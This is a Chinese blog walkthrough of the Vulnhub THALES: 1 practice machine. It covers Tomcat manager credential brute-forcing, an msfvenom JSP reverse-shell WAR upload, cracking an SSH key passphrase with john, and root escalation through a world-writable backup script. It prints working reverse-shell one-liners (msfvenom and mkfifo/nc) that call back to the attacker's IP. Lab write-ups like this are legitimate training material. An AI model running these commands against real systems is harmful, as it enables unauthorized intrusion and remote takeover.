Vulnhub——THALES: 1靶场

最新推荐文章于 2024-02-04 22:55:16 发布
最新推荐文章于 2024-02-04 22:55:16 发布
阅读量805 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Re1_zf/article/details/127868020
版权

一、概要

靶机:192.168.1.101
攻击机:192.168.1.115
靶机下载地址:https://download.vulnhub.com/thales/Thales.zip

二、主机发现

arp-scan发现目标靶机

三、信息收集

nmap扫描一下目标主机,得到一些信息

开放了22和8080端口,即ssh服务和web服务

访问一下web服务

是一个tomcat的首页

 登录管理员的话需要认证

四、账号密码爆破 

msf爆破一下账号密码

得到了账号密码

 

五、获取shell

进入到管理页面

 

应用程序列表这里有一个上传文件的地方

这里需要上传的是war文件,可以判断出后端是java的后端

使用msfvenom生成一个反弹shell的文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.115 LPORT=8888 -f war -o shell.war

本地开启对应的端口监听,再去访问触发一下这个文件

得到shell权限

 

再用python3 -c 'import pty;pty.spawn("/bin/bash")'

升级一下shell窗口就行了

六、ssh公钥

使用ls -la 

查看一下当前目录的所有文件

notes.txt中有一个提示

user.txt无权限读取

.ssh目录下有公私钥

保存一下ssh公钥

七、john公钥密码爆破

切换到/usr/share/john目录找到ssh2john.py脚本,将公钥文件转换一下格式,转化为JTR兼容的攻击文件

用john对密码进行爆破,使用的是/usr/share/wordlists/rockyou.txt字典

john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件

 爆破出的密码为vodka06

切换用户获得第一个flag

八、提权

前面这里还有个提示,查看一下这个文件

 可以看到这个文件是具有777权限的,我们可以写入

 

我们可以利用这个文件,修改它的内容向我们的攻击机反弹一个root权限的shell

 

向文件中写入一行命令

echo "rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 192.168.1.115 5555 >/tmp/a" >> backup.sh

攻击机监听对应端口

 

得到flag

九、新知识总结

1、msfvenom生成反弹shell的war文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.115 LPORT=8888 -f war -o shell.war

2、python脚本转换公钥文件为JTR攻击兼容文件

python3 ssh2john.py 需要处理的文件 > 输出的文件

3、john爆破ssh公钥(基于JTR攻击兼容文件)

john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件

4、利用mkfifo命令实现权限维持

mkfifo创建的是一个管道文件,这里这种情况下这个文件中的内容会实时更新,即输入的命令会被实时读取

echo "rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 192.168.1.115 5555 >/tmp/a" >> backup.sh

Re1_zf
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub靶场 --- NullByte: 1
m0_52072483的博客
01-15 338
Vulhub靶场 — NullByte: 1 地址:https://www.vulnhub.com/entry/nullbyte-1,126/ nmap dirb 80端口 查看源码也未发现任何信息 保存图片 通过strings命令查看隐藏信息 strings index.gif 关于strings命令 把以上结果当做目录访问 源码 在BP中使用rockyou.txt开始爆破 得到结果elite 登录后得到页面 随意输入字符进行测试 使用sqlmap猜测SQL注入 将得到
tomcat 靶机
SYJ_361的博客
03-25 1512
本文是渗透tomcat靶机获得其root权限,利用文件上传漏洞,上传包含.jsp文件的.war文件,然后进行反弹shell,再使用.jar文件反弹shell获取其root权限
Thales 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-15 906
Thales靶场渗透记录 提权好难~~
Vulnhub靶场THALES: 1
DG_s1mple
03-17 3012
环境准备 下载靶机导入到vmware 信息收集 我们使用arp-scan命令查找靶机的IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开启的服务 发现靶机开放了tomcat和ssh,我们先访问他的tomcat 渗透开始 tomcat发现可以登录,我们尝试爆破一下 成功爆破出账号密码,我们返回网站登录 发现manager app页面可以上传文件 我们使用如下命令创建一个反弹shell的木马上传 msfvenom -p ja
Vulnhub: Thales:1靶机
qq_43884092的博客
06-18 100
tomcat爆破后台账号密码,计划任务提权
vulnhub靶场Thales
最新发布
qq_58091216的博客
02-04 977
我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh。一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看。我们在thales目录下发现了隐藏的.ssh文件,我们进行查看。
靶机渗透练习12-Thales
hirak0的博客
04-15 1411
靶机描述 靶机地址:https://www.vulnhub.com/entry/thales-1,749/ Description Description : Open your eyes and change your perspective includes 2 flags:user.txt and root.txt. Telegram: @machineboy141 (for any hint) This works better with VIrtualBox rathe than VMware
thales
03-26
Thales,这个名字源于古希腊哲学家泰勒斯(Thales of Miletus),在现代则被用作一家全球领先的科技公司——泰雷兹(Thales Group)的名称。Thales集团是一家法国跨国企业,专注于为航空、国防、安全和太空等行业...
ProtoThalesThales移动游戏原型的存储库
02-08
1. **Unity引擎基础**:ProtoThales可能是使用Unity引擎构建的,因此了解Unity的基本概念,如场景管理、游戏对象、组件、脚本、光照、物理系统等是必要的。 2. **C#编程**:项目的代码部分将涵盖C#的基础语法、面向...
Thales-Reveal-Presentation:研究显示演示文稿
05-11
1. **核心特性**: - **响应式设计**:Thales-Reveal-Presentation支持多设备显示,无论是大屏幕还是小屏幕设备,都能提供良好的展示效果。 - **幻灯片分层**:你可以将内容分为主讲义和子讲义,通过平移和缩放...
Thales(泰勒兹)基于模型的系统工程方法论
08-15
法国泰勒兹集团(Thales)基于模型的系统工程方法论资料
dukpt-cli:DUKPT Thales HSM Payshield 9000 CLI工具
03-08
1. **Base Derivation Key (BDK)**:这是DUKPT系统中的主密钥,由金融机构提供,并存储在HSM中。所有交易密钥都基于BDK衍生而来。 2. **IPEK (Initial PIN Encryption Key)**:根据BDK生成的初始密钥,用于进一步...
vulnhub靶机-THALES: 1
臭nana的博客
03-18 4579
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录 可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
Vulnhub靶机:GEMINI INC_ 1
LainWith的博客
08-07 758
系列Gemini Inc(此系列共2台)**发布日期:**2018年01月09日**注释: **使用vmwar workstation运行虚拟机**难度: **中**目标: **取得 root 权限 + Flag主机发现端口扫描信息收集开源代码泄漏XSS漏洞SSRF漏洞LFI漏洞服务端组件漏洞SSH公钥认证SUID权限漏洞环境变量篡改本地提权。...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(六)covfefe [简单的利用缓冲区溢出提权]
hyjcking的博客
12-01 636
然后我们去访问.ssh目录,发现了三个文件,这三个文件分别对应着公钥、已接受的认证公钥、公钥,我们用kali自带的游览器将三个文件全部下载下来查看。这里发现了几个主要目录robots.txt和.ssh,我们先访问robots.txt,发现有三个目录,依次访问,在第三个目录中找到flag1。找到了usr目录里可读可写可执行的文件read.message,然后./运行它,发现需要我们输入正确的用户名,我们输入Simon后出现一封信。使用nmap对目标靶机端口进行探测,发现开启了22,80,31337端口。
vulhub thales:1 靶场
GRXHunter的博客
04-12 3436
vulhub thales:1靶场
靶机渗透之MY_TOMCAT_HOST
qq_52360932的博客
03-25 5287
靶机渗透之MY_TOMCAT_HOST
Vulnhub-thales靶机
lionwerson的博客
12-03 743
thales下载地址https://download.vulnhub.com/thales/Thales.zip1.导入virtual box,网络改为桥接模式,打开虚拟机。 2.nmap扫描一下端口: 开放了8080端口和22端口。 3.浏览器打开8080端口: 服务是tomcat,版本是9.0.52,没有任意文件读取和写入的漏洞,只能爆破manager app认证 4.burp认证爆破,tomcat的账号和密码格式是【用户名:密码】然后经过base64加密进行发送: ..
msfvenom生成各种Payload命令
IT界迷者Blog--
10-17 3138
msfvenom生成各种Payload命令 msfvenom -l 列出所有模块,攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > ...
Kitalpha-Accuracy-v0.2.pdf
12-21
这份文档由Thales集团发布,强调了内容的保密性和版权保护。" 在MBSE领域,Capella是一款强大的开源工具,用于系统建模和系统工程的全过程管理。它基于OMG(Object Management Group)的SysML(Systems Modeling ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值